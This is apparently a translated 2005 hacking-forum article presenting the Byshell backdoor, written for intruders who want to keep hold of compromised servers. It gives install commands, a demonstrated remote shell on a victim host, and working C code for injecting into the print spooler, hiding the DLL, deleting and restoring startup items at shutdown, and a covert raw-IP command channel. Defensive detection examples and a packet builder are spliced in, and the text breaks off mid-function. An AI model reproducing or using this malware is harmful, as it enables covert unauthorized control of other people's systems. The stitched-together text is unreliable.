Byshell Backdoor: no process, no DLL, no file on disk - vulnerability warning - myhack58

ID MYHACK58:6220055481
Type myhack58
Reporter Anonymous (佚名)
Modified 2005-12-16T00:00:00


Audience: intrusion enthusiasts, network administrators and hacking fans. Prerequisite: basic C syntax.

Backdoors are an eternal topic for hackers. After big sites such as 163, Yahoo and Peking University were compromised one after another, more and more people began to pay attention to server security, and backdoor techniques became hotter than ever. This article presents a heavyweight backdoor, both how to use it and how it is programmed, so that novices get a good backdoor to play with and programming enthusiasts get backdoor programming techniques to learn from. There are, of course, more new techniques waiting for you to discover.

Byshell Backdoor: no process, no DLL, no file on disk, no startup item

Plenty of trojan and backdoor tools are popular on the network now, but few of them can be called refined, and most novices use Radmin-class software in place of a backdoor. Unfortunately those are not real backdoors: a server administrator notices them very easily, so it is quite normal for compromised hosts ("broilers") to fly away again.

A qualified backdoor should at least meet these requirements:

1. It must not show up as a strange process in Task Manager. Giving the backdoor process a name that looks like a system process is only a deception.
2. It must not leave a well-known start value under the registry Run keys or add a service under the services startup keys, and it certainly must not be written into the Start menu startup folder.
3. It must not blatantly open a strange port, ignoring the administrator and the firewall. Something like Bits.dll, which has no listening port while it waits for a connection and only opens a port once a connection is being set up, escapes a port check only part of the time (about 30 percent, in the author's estimate).

Beyond that, a backdoor should ideally hide the files it generates, or at least avoid being caught by the system-file integrity checks some administrators run routinely. A backdoor that fails the first three points is not an "advanced" backdoor, and in use it has neither stability nor secrecy at all. By my classification, today's common backdoors fall into three "levels":

★ Application level. WinShell, Radmin, Glacier (冰河) and the like: they take basically no measures to hide themselves and are just ordinary applications that happen to provide remote control.

★ System level. These use, to a greater or lesser extent, Ring3 programming techniques to hide their tracks. Less used examples are Bits.dll and Portless; a much more widely used one is Hxdef.

Tip: Hxdef does ship a driver, but its system hooks are all in Ring3, so we tend to call it a system-level rather than a kernel-level backdoor.

★ Kernel level. The main part of the backdoor works in Ring0, which gives it very strong concealment and lethality. However, few complete kernel-level backdoors have been published, and their compatibility is also unsatisfactory. Phrack and rootkit.com carry many valuable discussions and results on this topic. My own system-level backdoor, Byshell v0.64, tries to meet the requirements above; because my ability is limited, its functions are not yet comprehensive or stable enough, and I hope you will give me advice or upgrade it yourselves. In this article I will discuss the design and implementation of this backdoor and, of course, its practical use. I hope the masters will not throw bricks; let us discuss it together.

Application examples

This is a backdoor that achieves no process, no DLL, no file on disk and no startup item. It uses thread injection to inject a DLL into a system process, unmaps the DLL, deletes its own files and startup items, and restores them at shutdown. Much of the design borrows from Nongfu's (农夫, "the farmer") Cmdbind2; my thanks to him for sharing it so selflessly. I permit this software and its source code to be distributed freely, but references should cite the source. Without contacting the author and obtaining permission, the software may not be modified, nor may the credits be removed, nor may it be used for commercial purposes; it may be used for study and private use.

Byshell 0.64 supports the following commands: cmd, shell, endshell, chpass, byver, sysinfo, pslist, pskill, modlist, get, put, reboot, dettach, popmsg, SYN, queryDOS, endDOS, refresh, etc. See the manual for specific usage.

Tip: the manual omits the refresh command. It removes a dead connection and gives you a chance to reconnect; it is also what you use after changing your IP to clear the original connection, since otherwise you cannot connect normally.

To install the backdoor, upload Ntboot.exe and Ntboot.dll to the same directory on the target and run "ntboot.exe -install". After installation Ntboot.exe and Ntboot.dll can be deleted by hand; connect with By064cli.exe. Note that Byshell v0.64 does not support testing against the local machine; v0.63 does. The demonstration below therefore uses v0.63.

1. Connection:

    please input the server ip address will be connected
    input the password(the default one is 'by')
    by

    cmd dir c:

     Volume in drive C has no label.
     Volume Serial Number is CCB2-D751

     Directory of c:\

    2005-01-29  14:22       <DIR>          Documents and Settings
    2004-10-01  19:24       <DIR>          Inetpub
    2004-11-17  20:56       <DIR>          Intel
    2004-10-30  14:18               24,576 isapilog.dll
    2004-11-11  00:55               24,576 magic_asp.dll
    2005-02-07  21:47       <DIR>          My Music
    2004-12-21  00:05                  124 Operate.ini
    2005-01-18  22:38       <DIR>          Program Files
    2005-02-07  23:31       <DIR>          ubackup
    2005-02-02  17:54       <DIR>          WINNT
                   3 File(s)         49,276 bytes
                   7 Dir(s)    124,207,104 bytes free

2. Getting a shell and ending it:


    Microsoft Windows 2000 [Version 5.00.2195]
    (C) Copyright 1985-2000 Microsoft Corp.

    C:\WINNT\system32>cd..

    C:\WINNT>cd..

    C:\>dir
     Volume in drive C has no label.
     Volume Serial Number is CCB2-D751

     Directory of C:\

    ...... (omitted)
                   3 File(s)         49,276 bytes
                   7 Dir(s)    124,207,104 bytes free

    C:\>endshell
    shell terminated


    ByShell server version 0.63 Released Dec 19,2004 Copyleft@ "by" co. ltd.

3. Listing and killing processes. There is a bug here: the columns are not aligned.


    process:
    pid    filename       num_thread  parentpid
    8      System         43          0
    184    smss.exe       6           8
    208    csrss.exe      11          184
    232    winlogon.exe   19          184
    260    services.exe   31          232
    272    lsass.exe      17          232
    456    svchost.exe    11          260
    488    SPOOLSV.EXE    14          260
    524    msdtc.exe      21          260
    636    svchost.exe    18          260
    656    llssrv.exe     9           260
    688    sqlservr.exe   28          260
    776    winmgmt.exe    3           260
    812    dfssvc.exe     2           260
    832    inetinfo.exe   29          260
    856    mssearch.exe   6           260
    1224   svchost.exe    11          260
    1176   explorer.exe   19          1172
    1356   igfxtray.exe   2           1176
    1404   PFWMain.exe    4           1176
    1412   SOUNDMAN.EXE   2           1176
    1428   realsched.exe  4           1176
    1436   internat.exe   1           1176
    1444   sqlmangr.exe   3           1176
    1280   BitComet.exe   9           1176
    328    notepad.exe    2           1176
    1196   MDM.EXE        5           456
    1512   conime.exe     1           1088
    1520   cmd.exe        1           488
    1504   by063cli.exe   1           1176


OK,the job was done,cuz we have localsystem & SE_DEBUG_NAME:)


    mods of the 1520:
    module_id  module_name    module_path
    1          ntdll.dll      C:\WINNT\System32\ntdll.dll
    1          KERNEL32.dll   C:\WINNT\system32\KERNEL32.dll
    1          USER32.dll     C:\WINNT\system32\USER32.dll
    1          GDI32.DLL      C:\WINNT\system32\GDI32.DLL
    1          ADVAPI32.dll   C:\WINNT\system32\ADVAPI32.dll
    1          RPCRT4.DLL     C:\WINNT\system32\RPCRT4.DLL
    1          MSVCRT.dll     C:\WINNT\system32\MSVCRT.dll
    1          IMM32.DLL      C:\WINNT\System32\IMM32.DLL

That covers the three most common functions. On many occasions these three are the most basic functions and also the three whose stability is hardest to guarantee. Note one trace the design does leave in the process listing: cmd.exe (PID 1520) hangs off PID 488, SPOOLSV.EXE, because the shell is spawned by the injected spooler. The most prominent feature of this backdoor, however, is its implementation of no process, no DLL, no file on disk and no startup item; in practice I believe you will find its advantages. Below we look at how these features are achieved from the design and programming points of view.
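One check the listing above invites, given here as an added example that is not part of ByShell or the article: pslist shows cmd.exe (PID 1520) with parent PID 488, SPOOLSV.EXE. A print spooler, lsass or services.exe that spawns a command shell is something a defender can flag from process-tree data alone, which no Ring3 hiding trick of the kind discussed here removes. The C below parses listings in the pslist layout ("pid filename num_thread parentpid") and flags shells whose parent is one of a short list of service processes. The sample listing is a constructed subset of the article's own output, and the two name lists are this example's choices.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>

/* Added example, not ByShell code: parent/child check over a pslist-style listing. */

#define MAX_PROCS 64

typedef struct {
    unsigned pid;
    char     name[64];
    unsigned threads;
    unsigned parent;
} proc_t;

/* Case-insensitive compare without strcasecmp (POSIX, not ISO C). */
static int name_eq(const char *a, const char *b)
{
    for (; *a && *b; a++, b++)
        if (tolower((unsigned char)*a) != tolower((unsigned char)*b))
            return 0;
    return *a == 0 && *b == 0;
}

/* Parse "pid name threads ppid" lines; blank or malformed lines are skipped.
 * Returns the number of processes stored in out. */
int parse_pslist(const char *text, proc_t *out, int cap)
{
    int n = 0;
    const char *line = text;
    while (*line && n < cap) {
        const char *nl = strchr(line, '\n');
        size_t len = nl ? (size_t)(nl - line) : strlen(line);
        char buf[160];
        if (len < sizeof buf) {
            memcpy(buf, line, len);
            buf[len] = 0;
            if (sscanf(buf, "%u %63s %u %u", &out[n].pid, out[n].name,
                       &out[n].threads, &out[n].parent) == 4)
                n++;
        }
        if (!nl) break;
        line = nl + 1;
    }
    return n;
}

/* This example's choice of names: shells, and service processes that have no
 * business starting one. */
static const char *const SHELLS[]   = { "cmd.exe", "command.com" };
static const char *const SERVICES[] = { "spoolsv.exe", "lsass.exe",
                                        "services.exe", "winlogon.exe" };

static int in_list(const char *name, const char *const *list, size_t count)
{
    for (size_t i = 0; i < count; i++)
        if (name_eq(name, list[i])) return 1;
    return 0;
}

/* Flag every shell whose parent is one of the service processes.
 * Writes the flagged PIDs to flagged; returns how many were flagged. */
int find_shells_under_services(const proc_t *p, int n, unsigned *flagged, int cap)
{
    int hits = 0;
    for (int i = 0; i < n && hits < cap; i++) {
        if (!in_list(p[i].name, SHELLS, sizeof SHELLS / sizeof *SHELLS)) continue;
        for (int j = 0; j < n; j++) {
            if (p[j].pid == p[i].parent &&
                in_list(p[j].name, SERVICES, sizeof SERVICES / sizeof *SERVICES)) {
                flagged[hits++] = p[i].pid;
                break;
            }
        }
    }
    return hits;
}

/* Constructed subset of the article's listing (pid name threads ppid). */
const char *SAMPLE_PSLIST =
    "8 System 43 0\n"
    "260 services.exe 31 232\n"
    "488 SPOOLSV.EXE 14 260\n"
    "1176 explorer.exe 19 1172\n"
    "1512 conime.exe 1 1088\n"
    "1520 cmd.exe 1 488\n"
    "1504 by063cli.exe 1 1176\n";

int sample_process_count(void)
{
    proc_t procs[MAX_PROCS];
    return parse_pslist(SAMPLE_PSLIST, procs, MAX_PROCS);
}

/* Returns the single flagged PID in the sample, or 0 if none (or several). */
unsigned sample_flagged_pid(void)
{
    proc_t procs[MAX_PROCS];
    unsigned flagged[MAX_PROCS];
    int n = parse_pslist(SAMPLE_PSLIST, procs, MAX_PROCS);
    int hits = find_shells_under_services(procs, n, flagged, MAX_PROCS);
    return hits == 1 ? flagged[0] : 0;
}

int main(void)
{
    unsigned pid = sample_flagged_pid();
    if (pid) printf("shell pid %u was spawned by a service process\n", pid);
    return pid ? 0 : 1;
}
```

The explorer-spawned by063cli.exe and the conime.exe whose parent is not in the listing are left alone; only the shell under the spooler is reported. The same logic applies to any process-tree source, not just pslist output.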

Design & programming

In this part I do not include the full code, since it is too long; I will quote key pieces to illustrate the ideas.

First, how does the backdoor hide its process? One common method is remote thread injection. Its biggest problem is that the injected code runs in the remote process's address space, and because the address space changes, every instruction that directly addresses the original address space needs relocating. To an old hand at assembly this is easy to understand; for a high-level-language programmer it means every explicit and implicit global variable, such as API addresses and strings, must be relocated by hand. Compared with a virus writer we are in a happy position, because our injector can inject a "global variable block" into the remote process at the same time, pass the block's address to the remote function, and have the remote function use that block in place of directly addressed globals; this spares us from writing fully "self-relocating" code, which is considered very cumbersome and almost impossible in a high-level language. Even so, writing relocatable code is still fairly complex, and a backdoor with many modules would be very tiring to write this way. Nongfu's Cmdbind2 is an injected backdoor with complete manual relocation; looking at his source shows that implementing just the common bind shell takes a lot of code, and a backdoor as function-rich as ByShell v0.64 would be unimaginably hard to implement like that.

The usual replacement for writing relocatable code is to inject a function that loads a DLL into the remote process, letting the system do the relocation for you, with the backdoor's main functionality implemented in the DLL; 单长虹 (Shan Changhong), for example, introduced this method in Hacker Defense (黑客防线). This method has a small drawback: an administrator auditing the injected process will find an unknown DLL and so expose the backdoor. Nongfu proposed an idea: load the DLL first, copy its whole memory image elsewhere, unload the DLL, then reserve the same address range the DLL was loaded at and copy the code back into it. The DLL can then be called directly, all relocation problems are solved, and our DLL does not appear in the injected process's loaded-module list. Nongfu did not turn his idea into code, so I used this method to implement the main code.

For comparison, let us look at other system-level methods of hiding a process. Bingle loads the backdoor as an Svchost-hosted service DLL, and ZXshell uses the same method. Its main problem is instability: you must rewrite sensitive registry values, and an unknown module appears among the modules loaded in Svchost.exe. If you replace an original DLL with a trojan DLL of the same name you avoid that problem but meet a new one: how to bypass Windows File Protection and the administrator's routine system-file integrity checks. Hxdef hooks Ring3 APIs, mainly the Native API in Ntdll.dll, to hide every aspect of itself. This works very well against ordinary Ring3 checks and can achieve partial port multiplexing. Its main problems are that Ring3 hooks, and in particular Hxdef's rather "crude" injection of trojan data into every process on the system, are not very effective against a Ring0 rootkit detector such as IceSword, and that the programming is cumbersome.

I chose to inject into the remote process Spoolsv.exe (the print spooler service) and, in the injected function, to load and then unload a trojan DLL, Ntboot.dll; the injector is Ntboot.exe. Here is the code:

    void injcode()
    {
        HANDLE prohandle;      // handle of the injection target
        DWORD pid = 0;         // target PID
        int ret;               // scratch

        // Use the ToolHelp32 snapshot to find the target's PID
        Sleep(1000);
        HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
        PROCESSENTRY32 processsnap;
        processsnap.dwSize = sizeof(PROCESSENTRY32);
        char injexe[] = "spoolsv.exe";   // injection target; change it as you like
        // The loop body is missing from this copy of the article; a name match is the evident intent
        for (ret = Process32First(snapshot, &processsnap); ret; ret = Process32Next(snapshot, &processsnap)) {
            if (!lstrcmpi(processsnap.szExeFile, injexe)) {
                pid = processsnap.th32ProcessID;
                break;
            }
        }
        CloseHandle(snapshot);
        if (!pid) return;      // target not running

        // Enable SeDebugPrivilege so a LocalSystem process can be opened
        HANDLE hToken;
        OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken);
        TOKEN_PRIVILEGES tp;
        tp.PrivilegeCount = 1;
        LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tp.Privileges[0].Luid);
        tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
        AdjustTokenPrivileges(hToken, 0, &tp, sizeof(tp), 0, 0);

        // Now inject
        prohandle = OpenProcess(PROCESS_ALL_ACCESS, 1, pid);
        DWORD WINAPI injfunc(LPVOID);   // injfunc is the injected function; it must relocate itself by hand

        // Resolve the API addresses the remote function needs and store them in the
        // "global variable block": injapistr, a global INJAPISTR structure
        HMODULE hModule;
        LPVOID paramaddr;      // address of the block inside the target
        hModule = LoadLibrary("kernel32.dll");
        injapistr.myLoadLibrary    = (HINSTANCE (__stdcall *)(const char *))GetProcAddress(hModule, "LoadLibraryA");
        injapistr.myGetProcAddress = (FARPROC (__stdcall *)(HMODULE, LPCSTR))GetProcAddress(hModule, "GetProcAddress");
        injapistr.myVirtualAlloc   = (void *(__stdcall *)(void *, unsigned long, unsigned long, unsigned long))GetProcAddress(hModule, "VirtualAlloc");
        injapistr.myFreeLibrary    = (int (__stdcall *)(HINSTANCE))GetProcAddress(hModule, "FreeLibrary");
        injapistr.myIsBadReadPtr   = (int (__stdcall *)(const void *, unsigned int))GetProcAddress(hModule, "IsBadReadPtr");
        injapistr.myVirtualFree    = (int (__stdcall *)(void *, unsigned long, unsigned long))GetProcAddress(hModule, "VirtualFree");

        // Allocate the block in the target and write the API addresses into it
        paramaddr = VirtualAllocEx(prohandle, 0, sizeof(injapistr), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
        ret = WriteProcessMemory(prohandle, paramaddr, &injapistr, sizeof(injapistr), 0);

        // Write injfunc itself (a flat 20000-byte copy, which must cover the whole function)
        void *injfuncaddr = VirtualAllocEx(prohandle, 0, 20000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
        ret = WriteProcessMemory(prohandle, injfuncaddr, injfunc, 20000, 0);

        // Start the remote thread with the block's address as its parameter
        CreateRemoteThread(prohandle, 0, 0, (LPTHREAD_START_ROUTINE)injfuncaddr, paramaddr, 0, 0);
        CloseHandle(prohandle);
        return;
    }

    // The injected function. It runs inside the target and does the hard part: loading and
    // unloading the backdoor DLL. paramaddr is the address of the global variable block.
    // Every static global must be relocated because it is directly addressed; dynamically
    // allocated memory (heap, VirtualAlloc) and stack variables need nothing, since they are
    // addressed indirectly. The strings could also have gone into the block, but there are
    // only two, so they are built directly with inline asm.
    DWORD WINAPI injfunc(LPVOID paramaddr)
    {
        char ntboot[16];
        char msgbox[16];   // badly named: it holds the name of the DLL's main export, not a message box
        INJAPISTR *pinjapistr = (INJAPISTR *)paramaddr;
        __asm {
            mov ntboot, 'n'
            mov ntboot+1, 't'
            mov ntboot+2, 'b'
            mov ntboot+3, 'o'
            mov ntboot+4, 'o'
            mov ntboot+5, 't'
            mov ntboot+6, '.'
            mov ntboot+7, 'd'
            mov ntboot+8, 'l'
            mov ntboot+9, 'l'
            mov ntboot+10, 0
            mov msgbox, 'C'
            mov msgbox+1, 'm'
            mov msgbox+2, 'd'
            mov msgbox+3, 'S'
            mov msgbox+4, 'e'
            mov msgbox+5, 'r'
            mov msgbox+6, 'v'
            mov msgbox+7, 'i'
            mov msgbox+8, 'c'
            mov msgbox+9, 'e'
            mov msgbox+10, 0
        }
        // Load Ntboot.dll normally, so the loader relocates it and resolves its imports
        HMODULE hModule = pinjapistr->myLoadLibrary(ntboot);
        DWORD (WINAPI *myCmdService)(LPVOID);   // the DLL's main function
        myCmdService = (DWORD (WINAPI *)(LPVOID))pinjapistr->myGetProcAddress(hModule, msgbox);

        // Dear reader, here is the essence: copy the mapped image aside, unload the DLL,
        // reserve the same base address again and copy the image back. 0x23000 is the
        // size of the DLL, no less; if the size of Ntboot.dll changes, adjust this value.
        unsigned int memsize = 0;
        void *tempdll = pinjapistr->myVirtualAlloc(0, 0x23000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
        memcpy(tempdll, hModule, 0x23000);
        pinjapistr->myFreeLibrary(hModule);
        hModule = (HMODULE)pinjapistr->myVirtualAlloc(hModule, 0x23000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
        memcpy(hModule, tempdll, 0x23000);
        pinjapistr->myVirtualFree(tempdll, 0x23000, MEM_DECOMMIT);
        // Done: the DLL is no longer loaded, yet its code is back at the address it was
        // relocated for, so the entry point we resolved still works. Cool, right?
        myCmdService(0);   // call the backdoor's main function
        return 0;
    }

Two things to watch in injfunc. The calls to memcpy must compile to an inline rep movs (the compiler intrinsic), because an ordinary call into the CRT's memcpy is a direct address into the injector's image, which does not exist in Spoolsv.exe; the same goes for any compiler-inserted stack-check call. And reserving the old base again can fail if anything else takes that range between FreeLibrary and VirtualAlloc. Reusing the kernel32 addresses resolved in the injector works because kernel32 is mapped at the same base in every process on these systems.

The next problem is startup items and files. Ntboot.exe, the backdoor's injector, starts itself as a service, and we must not let the administrator find the service's key values. What to do? This too is an idea proposed by Nongfu: first delete all of the backdoor's files and the service, then set a shutdown notification and a hook on the shutdown click, and write the files and the service back at shutdown time. Likewise, as soon as the service starts it deletes itself first. This gives no file and no startup item: an administrator comparing registry snapshots finds nothing abnormal, and there is nowhere to look for our backdoor file. Here is the code that sets the shutdown notification and the shutdown-click hook:

    DWORD WINAPI hookthread(LPVOID lpParam)
    {
        MSG msg;
        int tmpret;
        char tmpstr[100];
        LRESULT CALLBACK JournalRecordProc(int code, WPARAM wParam, LPARAM lParam);

        // Shutdown-click hook: a system-wide journal record hook
        msghook = SetWindowsHookEx(WH_JOURNALRECORD, JournalRecordProc, GetModuleHandle(0), 0);
        if (!msghook) {
            // failure branch missing from this copy of the article
        }
        // Shutdown notification: the console control handler receives CTRL_SHUTDOWN_EVENT
        tmpret = SetConsoleCtrlHandler(HandlerRoutine, 1);
        if (!tmpret) {
            // failure branch missing from this copy of the article
        }
        while (GetMessage(&msg, NULL, 0, 0)) {
            void resume();
            if (msg.message == WM_QUERYENDSESSION) {
                resume();   // branch body missing from this copy; restoring the files is the described intent
            }
        }
        UnhookWindowsHookEx(msghook);
        return 0;
    }

    BOOL WINAPI HandlerRoutine(DWORD dwCtrlType)
    {
        void resume();
        switch (dwCtrlType) {
        case CTRL_SHUTDOWN_EVENT:
            resume();   // resume(), as the name says, restores the files and the startup items
            break;
        default:
            break;
        }
        return 0;
    }

    LRESULT CALLBACK JournalRecordProc(int code, WPARAM wParam, LPARAM lParam)
    {
        void resume();
        if (code < 0) {
            return CallNextHookEx(msghook, code, wParam, lParam);
        }
        if (code == HC_ACTION) {
            EVENTMSG *pevent = (EVENTMSG *)lParam;
            // The key event the author takes as the shutdown click; the branch body is
            // missing from this copy and resume() is the described intent
            if (pevent->message == WM_KEYDOWN && LOBYTE(pevent->paramL) == 0xFF) {
                resume();
            }
        }
        return CallNextHookEx(msghook, code, wParam, lParam);
    }

One caveat on the message loop: WM_QUERYENDSESSION is sent to top-level windows, so a thread that owns no window never sees it from GetMessage; in a service process it is the console control handler's CTRL_SHUTDOWN_EVENT that actually fires.
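To make the relocation rules that injfunc above lives by concrete, here is an added example in portable C; it is not ByShell's code. It models the contract between injector and injected function: the injector resolves every external address into one block, and the injected function uses only that block and its own stack, building its two strings byte by byte just as the inline asm above does. The block, function and loader names are this example's own, and the loader is a test double that records what the payload asked for rather than a real LoadLibrary; nothing here is copied into another process.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Added example, not ByShell code. api_block_t plays the role of the
 * article's INJAPISTR; injected_payload plays the role of injfunc. */

typedef uint32_t (*entry_fn)(void *arg);
typedef void *(*load_fn)(const char *name);
typedef entry_fn (*getproc_fn)(void *module, const char *symbol);

typedef struct {
    load_fn    load_library;       /* stands in for LoadLibraryA   */
    getproc_fn get_proc_address;   /* stands in for GetProcAddress */
} api_block_t;

/* The "remote" function. The rules, the same ones injfunc obeys:
 *  - no static or global data (an absolute address into the injector's image);
 *  - no string literals (they live in the injector's .rdata);
 *  - no calls except through the block (a direct call is a relative jump
 *    into code the target process does not have);
 *  - no compiler-inserted calls either: build without stack cookies and make
 *    sure memcpy/memset are inlined.
 * Strings are built byte by byte on the stack, the C form of "mov ntboot,'n'". */
entry_fn injected_payload(const api_block_t *api)
{
    char dll[16];
    char sym[16];
    dll[0] = 'n'; dll[1] = 't'; dll[2] = 'b'; dll[3] = 'o'; dll[4] = 'o';
    dll[5] = 't'; dll[6] = '.'; dll[7] = 'd'; dll[8] = 'l'; dll[9] = 'l';
    dll[10] = 0;
    sym[0] = 'C'; sym[1] = 'm'; sym[2] = 'd'; sym[3] = 'S'; sym[4] = 'e';
    sym[5] = 'r'; sym[6] = 'v'; sym[7] = 'i'; sym[8] = 'c'; sym[9] = 'e';
    sym[10] = 0;

    void *mod = api->load_library(dll);
    if (mod == NULL)
        return NULL;
    return api->get_proc_address(mod, sym);
}

/* Test doubles standing in for the target's loader. They record what the
 * payload asked for so a harness can confirm it needed nothing beyond the
 * block. Constructed for this example. */
static char g_requested_dll[32];
static char g_requested_sym[32];
static int  g_module_tag;

static uint32_t fake_entry(void *arg) { (void)arg; return 0x42; }

static void *fake_load(const char *name)
{
    strncpy(g_requested_dll, name, sizeof g_requested_dll - 1);
    return &g_module_tag;              /* any non-NULL "module handle" */
}

static entry_fn fake_getproc(void *module, const char *symbol)
{
    if (module != &g_module_tag)
        return NULL;
    strncpy(g_requested_sym, symbol, sizeof g_requested_sym - 1);
    return fake_entry;
}

const char *requested_dll(void) { return g_requested_dll; }
const char *requested_sym(void) { return g_requested_sym; }

/* Injector side: fill the block (here with the doubles; on Windows with
 * GetProcAddress on kernel32), run the payload against it and call whatever
 * entry point it resolved. Returns that entry's result, or -1 on failure. */
int run_injection_model(void)
{
    api_block_t block;
    block.load_library     = fake_load;
    block.get_proc_address = fake_getproc;
    entry_fn entry = injected_payload(&block);
    if (entry == NULL)
        return -1;
    return (int)entry(NULL);
}

int main(void)
{
    return run_injection_model() == 0x42 ? 0 : 1;
}
```

Read injected_payload with the relocation question in mind: nothing in it is an address that belongs to the injector, which is exactly the property injfunc has to keep when it is copied into Spoolsv.exe with a flat WriteProcessMemory.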

Compared with Hxdef's hooking of the file and registry Native APIs, the benefit of this approach is that the file simply does not exist, so no Ring0 rootkit detector will find a hooked API hiding files or registry keys. The downside is that if someone pulls the power to shut the machine down, we "rest in peace". We can console ourselves that this backdoor is hidden well enough that nobody will suspect it and resort to the "abnormal" tool of powering the machine off. If you use Hxdef, by contrast, believe me: now that rootkit detectors are everywhere, Hxdef has become a punching bag and will "rest" very quickly once an administrator checks.

Last is how to achieve "no port". Hiding a port with a rootkit is not "no port": that kind of thing cannot pass a firewall and is exposed as soon as the administrator scans his own machine. This is Byshell v0.64's weak point, since a Ring3 backdoor never had a good way to multiplex a port. Listening to TCP with a raw socket can only do what Bits.dll does: "no port while waiting for a connection". Loading yourself as an SPI base service provider or layered service provider lets you intercept all Ring3 network traffic, but leaves too much information in the registry and the system, which leads to our backdoor "resting". Hxdef hooks recv/WSARecv in every process on the system; it cannot multiplex ports served from Ring0 such as 139 and 445, but it is still the better Ring3 port-multiplexing approach for now. So far Byshell's approach is to use a raw socket with a custom protocol, neither TCP nor UDP, for communication. It passes most software firewalls and hardware firewalls, but it is not guaranteed to pass all of them, and it does not work on Windows XP SP2, which restricted raw socket support.

My implementation is fairly simple: IP protocol number 224 carries connection monitoring and refresh, and protocol number 225 carries the backdoor data:

    WSADATA WSAData;
    WSAStartup(MAKEWORD(2, 2), &WSAData);
    SOCKET sock224 = socket(AF_INET, SOCK_RAW, 224);   // IP protocol 224: control channel
    sockaddr_in srvaddr;
    memset(&srvaddr, 0, sizeof(struct sockaddr_in));
    srvaddr.sin_family = AF_INET;
    srvaddr.sin_addr.S_un.S_addr = INADDR_ANY;
    ret = bind(sock224, (struct sockaddr *)&srvaddr, sizeof(struct sockaddr));
    if (ret) { goto label2; }
    dwThreadId = 0;
    char buff224[128];
    DWORD WINAPI threadfunc(LPVOID lpParam);
    HANDLE thrdhndl;
    // The 225 data channel runs in its own thread
    thrdhndl = CreateThread(0, 0, threadfunc, 0, 0, &dwThreadId);
    // Wait for a refresh. A raw socket delivers the IP header first, then the
    // password, then, 32 bytes further on, the refresh marker
    while (1) {
        recvfrom(sock224, buff224, 128, 0, 0, 0);
        if (!strncmp(buff224 + 32 + sizeof(IP_HEADER), "+_)(&^%$#@!~ byrefreshbreak", 27)
            && !strncmp(buff224 + sizeof(IP_HEADER), pwd, strlen(pwd))) {
            TerminateThread(thrdhndl, 0);
            goto label1;
        }
    }

Two weak points in this loop are worth knowing: the return value of recvfrom is never checked and buff224 is not cleared between reads, so a short datagram leaves the earlier bytes in place and a stale password can still satisfy the compare; and TerminateThread abandons whatever the 225 thread was holding. On the 225 side I implemented simple error control; that code is rather long and not listed here, interested readers please see the source. Because this multiplexing method is not very reliable or stable, I also released Byshell v0.63, which simply opens TCP port 138; it is a completely incompatible backdoor, but it serves for testing. If you find Byshell v0.64 unstable, try v0.63. A serious mistake of mine is that the Byshell v0.64 manual omits the command "refresh", which clears a 225 connection that has died and gives you the chance to reconnect.

Finally, Byshell implements many commands, such as viewing system information, executing commands, uploading and downloading over the backdoor connection, and even a SYN flood. The backdoor's functions live in the Work() function, which makes functional extension and modular programming convenient. Given the unsatisfactory state of port multiplexing, I will keep upgrading it.
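As an added example that is not ByShell's code, here is the datagram layout of the 224 control channel above in portable C: a builder that emits a refresh datagram the way the client must (20-byte IPv4 header with protocol 224, the password right after the header, the 27-byte marker 32 bytes further on, and a correct header checksum), and a classifier that does what the server loop does but checks the datagram length before comparing. The function names, the TTL and the addresses are this example's assumptions; "by" is the article's default password. On the defender's side the same facts give a capture filter: IP protocols 224 and 225 are unassigned, so tcpdump -n 'ip proto 224 or ip proto 225' has nothing legitimate to show.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>

/* Added example, not ByShell code: builder and classifier for the 224/225 raw-IP channel. */

#define IP_HDR_LEN   20
#define PWD_OFF      IP_HDR_LEN
#define MARKER_OFF   (IP_HDR_LEN + 32)
#define PROTO_CTRL   224
#define PROTO_DATA   225
#define MARKER_LEN   27

static const char REFRESH_MARKER[] = "+_)(&^%$#@!~ byrefreshbreak";  /* 27 bytes, as in the article */

enum pkt_kind { PKT_OTHER = 0, PKT_BY_CONTROL, PKT_BY_DATA, PKT_BY_REFRESH };

/* RFC 791 header checksum: ones'-complement sum of 16-bit words. */
uint16_t ip_checksum(const uint8_t *hdr, size_t n)
{
    uint32_t sum = 0;
    for (size_t i = 0; i + 1 < n; i += 2)
        sum += (uint32_t)(hdr[i] << 8 | hdr[i + 1]);
    if (n & 1)
        sum += (uint32_t)hdr[n - 1] << 8;
    while (sum >> 16)
        sum = (sum & 0xFFFF) + (sum >> 16);
    return (uint16_t)~sum;
}

/* Write a refresh datagram: header, password, zero padding, marker.
 * Returns the total length, or 0 if the buffer or password is unsuitable. */
size_t build_refresh_packet(uint8_t *out, size_t cap, const char *pwd,
                            uint32_t src, uint32_t dst)
{
    size_t pwd_len = strlen(pwd);
    size_t total = MARKER_OFF + MARKER_LEN;
    if (pwd_len == 0 || pwd_len > 32 || cap < total)
        return 0;
    memset(out, 0, total);
    out[0] = 0x45;                          /* IPv4, IHL = 5 (no options)    */
    out[2] = (uint8_t)(total >> 8);         /* total length                  */
    out[3] = (uint8_t)total;
    out[8] = 64;                            /* TTL: this example's choice    */
    out[9] = PROTO_CTRL;
    out[12] = (uint8_t)(src >> 24); out[13] = (uint8_t)(src >> 16);
    out[14] = (uint8_t)(src >> 8);  out[15] = (uint8_t)src;
    out[16] = (uint8_t)(dst >> 24); out[17] = (uint8_t)(dst >> 16);
    out[18] = (uint8_t)(dst >> 8);  out[19] = (uint8_t)dst;
    uint16_t csum = ip_checksum(out, IP_HDR_LEN);
    out[10] = (uint8_t)(csum >> 8);
    out[11] = (uint8_t)csum;
    memcpy(out + PWD_OFF, pwd, pwd_len);
    memcpy(out + MARKER_OFF, REFRESH_MARKER, MARKER_LEN);
    return total;
}

/* Server-side view of one datagram as read from a raw socket (header included,
 * as on Windows). Unlike the article's loop, the length is checked before any
 * compare, so bytes left over from an earlier read cannot satisfy the test. */
enum pkt_kind classify_packet(const uint8_t *pkt, size_t len, const char *pwd)
{
    if (len < IP_HDR_LEN || (pkt[0] >> 4) != 4)
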